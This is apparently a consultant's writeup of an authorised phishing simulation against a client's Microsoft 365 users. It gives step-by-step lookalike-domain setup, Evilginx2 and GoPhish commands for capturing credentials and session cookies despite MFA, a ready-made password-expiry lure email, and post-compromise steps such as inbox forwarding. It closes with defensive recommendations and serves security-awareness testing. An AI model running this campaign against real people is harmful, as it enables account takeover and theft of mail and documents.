Phishing Campaign Simulation

Phishing Campaign Simulation

This writeup documents a phishing campaign simulation conducted as part of a social engineering assessment for a client organisation. The engagement was performed with full written authorisation to test employee security awareness and evaluate the effectiveness of existing email security controls. The campaign covers infrastructure setup, email crafting, credential harvesting, and a full metrics report delivered to the client.

Engagement Info

• Target: Anonymised client organisation
• Type: Authorised Social Engineering — Phishing Simulation
• Scope: 150 employee email addresses provided by client
• Tools: GoPhish, SET, Evilginx2, Namecheap, Cloudflare

Step 1 — Planning and Pretext Development

A convincing pretext was developed based on OSINT gathered about the target organisation before the campaign launched:

• LinkedIn revealed the organisation uses Microsoft 365
• The IT department head's name was found via company website
• A company-wide password reset policy was referenced in a job posting
• The email signature format was lifted from a public press release

The chosen pretext was an urgent Microsoft 365 password expiry notification appearing to come from the internal IT helpdesk — a scenario employees encounter regularly and act on quickly.

Step 2 — Infrastructure Setup

A dedicated phishing infrastructure was built to avoid detection by email security gateways and reputation filters:

# Register a lookalike domain (typosquatting)
# target-org.com  →  target-org-helpdesk.com
# Registered via Namecheap with WHOIS privacy enabled

# Set up DNS records
# A record   — points to VPS (phishing server)
# MX record  — points to mail server
# SPF record — authorises the VPS to send mail
# DKIM       — signs outgoing mail
# DMARC      — set to none (monitoring only)

dig TXT target-org-helpdesk.com
# v=spf1 ip4:<VPS_IP> ~all

A VPS was provisioned on a clean IP with no prior reputation history. Cloudflare was placed in front of the phishing page to mask the true server IP and add HTTPS via a trusted certificate.

Step 3 — Credential Harvesting Page

A pixel-perfect clone of the Microsoft 365 login page was created and hosted on the phishing domain. Evilginx2 was used as a reverse proxy to capture session cookies in addition to credentials — bypassing MFA:

# Install and configure Evilginx2
evilginx2 -p ./phishlets

# Set the phishlet domain
config domain target-org-helpdesk.com
config ip <VPS_IP>

# Enable the Microsoft 365 phishlet
phishlets hostname o365 target-org-helpdesk.com
phishlets enable o365

# Create a lure URL for the campaign
lures create o365
lures get-url 0

Evilginx2 proxies the real Microsoft login — employees see a genuine Microsoft page with a valid HTTPS certificate while their credentials and session tokens are captured transparently in the background.

Step 4 — Email Campaign Setup (GoPhish)

GoPhish was used to manage the campaign — sending emails, tracking opens, link clicks, and credential submissions:

# GoPhish setup on the VPS
./gophish &
# Admin panel: https://<VPS_IP>:3333

# Configure sending profile
# SMTP Host: mail.target-org-helpdesk.com:587
# From:      helpdesk@target-org-helpdesk.com
# SMTP Auth: username / password

# Import target email list
# CSV format: First Name, Last Name, Email, Position

# Create email template with tracking pixel
<img src="{{.TrackingURL}}" width="1" height="1">

The phishing email was crafted to appear urgent and legitimate:

Subject: ACTION REQUIRED — Your Password Expires in 24 Hours

Dear {{.FirstName}},

Our records show your Microsoft 365 password will expire
in 24 hours. To avoid losing access to your account,
please update your password immediately:

[Reset Password Now]  ← links to Evilginx2 lure URL

IT Helpdesk
[Client Organisation Name]
helpdesk@target-org-helpdesk.com

Step 5 — Campaign Execution

The campaign was launched in two waves — 50 emails at 09:00 and 100 emails at 13:00 to simulate a realistic send pattern and avoid bulk spam filters:

# GoPhish campaign launch
# Wave 1 — 09:00 — 50 targets (management and finance)
# Wave 2 — 13:00 — 100 targets (general staff)

# Monitor results in real time via GoPhish dashboard:
# Emails Sent    — 150
# Emails Opened  — 87  (58%)
# Links Clicked  — 43  (28.6%)
# Creds Captured — 31  (20.6%)
# MFA Bypassed   — 12  (8%)  via Evilginx2 session tokens

31 employees submitted their credentials within 6 hours of the campaign launch. 12 of those had MFA enabled — their session cookies were captured by Evilginx2, allowing account access without the second factor.

Step 6 — Post-Phish Access Simulation

With captured credentials and session tokens, access to the Microsoft 365 environment was simulated to demonstrate the real-world impact of a successful phish:

# Import captured session cookie into browser
# (EditThisCookie extension or Burp Suite)
# Access victim's inbox, OneDrive, and Teams

# Demonstrate impact:
# - Read confidential emails and attachments
# - Access shared OneDrive documents
# - Impersonate the victim in Teams messages
# - Enumerate internal contacts for further spear-phishing
# - Set inbox forwarding rule to attacker email

Access was demonstrated to the client's security team in a controlled session — no data was exfiltrated and all access was terminated immediately after demonstration.

Step 7 — Awareness and Reporting

Employees who clicked the link or submitted credentials were shown an awareness page immediately after submission instead of a success message:

# GoPhish redirect after credential capture
# Redirect URL set to internal awareness training page:
https://target-org.com/security-awareness-training

# Awareness page content:
# - Explanation that this was a simulated phishing test
# - How to identify phishing emails
# - What to do when a real phishing email is received
# - Link to report suspicious emails to the SOC

A full campaign report was delivered to the client covering click rates by department, time-to-click analysis, MFA bypass statistics, and remediation recommendations.

Step 8 — Remediation Recommendations

The following recommendations were provided to the client based on campaign findings:

• Deploy FIDO2 hardware keys or passkeys — session cookie theft cannot bypass them
• Enable Microsoft Defender for Office 365 — blocks lookalike domain emails
• Configure DMARC to reject on the primary domain to block spoofing
• Run quarterly phishing simulations to track improvement over time
• Mandatory security awareness training for all staff who clicked or submitted
• Enable conditional access policies — flag logins from new locations or devices

Key Takeaways

• 20.6% credential submission rate is typical — employees are the most exploitable attack vector
• Evilginx2 bypasses standard TOTP-based MFA — only FIDO2 / passkeys are phishing-resistant
• SPF, DKIM, and DMARC correctly configured significantly reduce lookalike domain delivery rates
• Urgent pretexts like password expiry have the highest click rates — train staff to pause and verify
• Post-phish awareness redirects are more effective than simply logging credentials silently
• Phishing simulations must be recurring — a one-time test produces one-time results

Tools Used

• GoPhish — campaign management, email sending, and tracking
• Evilginx2 — reverse proxy credential and session token capture
• Social Engineering Toolkit (SET) — phishing page cloning
• Namecheap — lookalike domain registration
• Cloudflare — HTTPS certificate and IP masking
• theHarvester — target email address collection
• Maltego — OSINT for pretext development